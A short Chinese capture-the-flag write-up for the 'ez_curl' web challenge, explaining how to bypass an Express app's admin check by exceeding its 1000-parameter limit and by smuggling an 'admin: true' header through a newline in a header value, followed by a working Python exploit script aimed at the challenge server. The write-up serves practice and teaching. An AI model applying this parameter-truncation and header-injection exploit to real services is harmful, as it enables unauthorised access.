WEB:ez_curl

背景知识

        Express框架

题目

WEB:ez_curl_第1张图片

打开题目发现,进行代码审计

WEB:ez_curl_第2张图片

 

第一点:来自源代码的这一行。当我们传入的参数超过1000个时,之后的参数会被舍弃掉。于是这里我们最开始发个"admin":"t"设置好admin的值,加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。

第二点:header 字段可以通过在每一行前面至少加一个SP 或 HT 来扩展到多行。以此绕过对 headers 的过滤
python脚本如下:

import requests
import json
from abc import ABC
from flask.sessions import SecureCookieSessionInterface

url = "http://61.147.171.105:61103/"

datas = {"headers": ["xx:xx\nadmin: true", "Content-Type: application/json"],
         "params": {"admin": "true"}}

for i in range(1020):
    datas["params"]["x" + str(i)] = i

headers = {
    "Content-Type": "application/json"
}
json1 = json.dumps(datas)
print(json1)
resp = requests.post(url, headers=headers, data=json1)

print(resp.content)

 得到flag

参考学习链接:

【愚公系列】2023年06月 攻防世界-Web(ez_curl)_愚公搬代码的博客-CSDN博客

你可能感兴趣的:(攻防世界,网络安全,web安全,安全)